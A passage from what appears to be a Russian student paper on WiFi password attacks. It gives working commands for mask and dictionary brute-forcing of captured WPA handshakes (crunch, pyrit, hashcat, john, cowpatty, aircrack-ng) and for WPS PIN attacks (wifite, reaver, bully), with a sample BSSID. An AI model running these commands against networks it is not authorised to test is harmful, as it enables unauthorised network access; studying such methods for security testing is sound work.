найден, можно выключать терминал.5.1.4 Вывод по четвертому разделу первой главы
В данном разделе описывается подбор пароля к захваченному и расшифрованному handshake, перебор по словарю это очень затратный по времени процесс, если конечно мы не создали базу данных паролей, как было показано в способе с помощью утилиты Pyrit. Бывают случаи что пароль в словаре не будет найдет это около 80%, так как остальные 20% это популярные пароли которые выбирают пользователи.
5.2 Перебор по маске5.2.1 Crunch + Pyrit
Если мы хотим перебрать все цифровые пароли определённой длинны — это можно сделать с помощью команды
crunch 8 10 0123456789 | pyrit -r wpaaa.cap -e MYNET -i - attack_passthrough
Пароль будет перебиратся очень долго в связи с аппаратным обеспечением
5.2.2 Hashcat
Для начала надо перезаписать handshake из *.cap формата в *.hccap Далее вводим:
hashcat -m2500 -a3 hashcat.hccap ?d?d?d?d?d?d?d?dздесь -m2500 обозначает подбор ключа в WPA-рукопожатии, -a3 задаёт режим подбора по маске, а ?d... — саму маску для генерации слов (?d обозначает символы 0-9, а восемь ?d подряд обозначают 8 цифр одна за другой)
5.2.3 Johnny
Эта утилита перебирает все возможные пароли подряд
john --stdout --incremental:Digits | aircrack-ng -b C4:A8:1D:52:49:CE -w - w.cap
--stdout - стандартный вывод
--incremental:Digits - перебор только цифр Как видим наш пароль перебрался очень быстро из за фильтрации паролей по цифрам
5.2.4 Crunch + Cowpatty
Генерация чисел от 0 до 9 в 8 значном пароле и проверяется все через cowpatty
crunch 8 8 0123456789 | cowpatty -f - -s 4len -r w.cap
5.2.5 Crunch + Pyrite + Cowpatty
В этом способе мы генерируем пароли через crunch, берем файл через cowpatty и проверяем через pyrite
crunch 8 8 012345678 | pyrit -e 4len -i - -o - passthrough | cowpatty -d - -r /root/hashcat.hccap -s 4len
5.2.6 Выводы по четвертому разделу второй главеПереьор по маске очень подходит для нашей ели, но только в том случае что есть очень мощьное аппаратное обеспечение так как без него генерация и подпор паролей будет длится не дни и не недели а намного больше по той причине что процесы будут обрабатыватся очень медленно, а так как пароль может состоить из 8 символов это еще больше усложняет нам задачу при генерации восьми значного пароля
6. Атака WiFi через одноименный протокол WPS
Взлом WiFi через WPS один из самых быстрых и легких способов получить пароль от нужного нам WiFi, т.к. Одноименный протокол WPS состоит из 8-ми значного пин-кода, введа который мы подключимся к точке доступа и нам не помешают WPA/WEP пароли. Хоть и в пин-коде 8 знаков, последний знак это контрольная сумма, но протоколе WPS есть уязвимость которая позволяет нам проверять пин-код не целиком а блоками. Первый блок 4 цифры и второй блок 3 цифры. Всего 10998 комбинаций
6.1 Wifite
Наберите следующую команду в вашем терминале Kali Linux:
Wifite Выбираем цифру нужной нам сети и жмем Enter Инициализируется атака на впс так как не был подобран впс пинЕсли wps атака не прошла то программа ловит handshake и заканчивает с этой сетью
6.2 Reaver
airmon-ng
airmon-ng start wlan0
И видим сети вокруг нас
wash -i mon0 -C
и видим сети с включенным WPS.
Копируем BSSID и пишем
reaver -i mon0 -b C4:A8:1D:52:49:CE -a -vv
Или через команду Bully bully mon0 -b C4:A8:1D:52:49:CE -e 4len -c 13
Перебор начат Т.к. Превышено количество соединений с роутером то команда reaver будет ждать 60 секунд пока не разблокируется WPS для подключения, но чтобы не ждать мы будем использовать секретные номера Диффи-Хеллмана, чтобы уменьшить
Похожие работы
Тема: Обзор методов оздоровления |
Предмет/Тип: Медицина, физкультура, здравоохранение (Реферат) |
Тема: Обзор возможных методов защиты |
Предмет/Тип: Информатика, ВТ, телекоммуникации (Реферат) |
Тема: Обзор возможных методов защиты |
Предмет/Тип: Информатика, ВТ, телекоммуникации (Реферат) |
Тема: Обзор возможных методов защиты |
Предмет/Тип: Информационные технологии (Реферат) |
Тема: Обзор методов диагностики агрессивности |
Предмет/Тип: Психология (Реферат) |
Интересная статья: Основы написания курсовой работы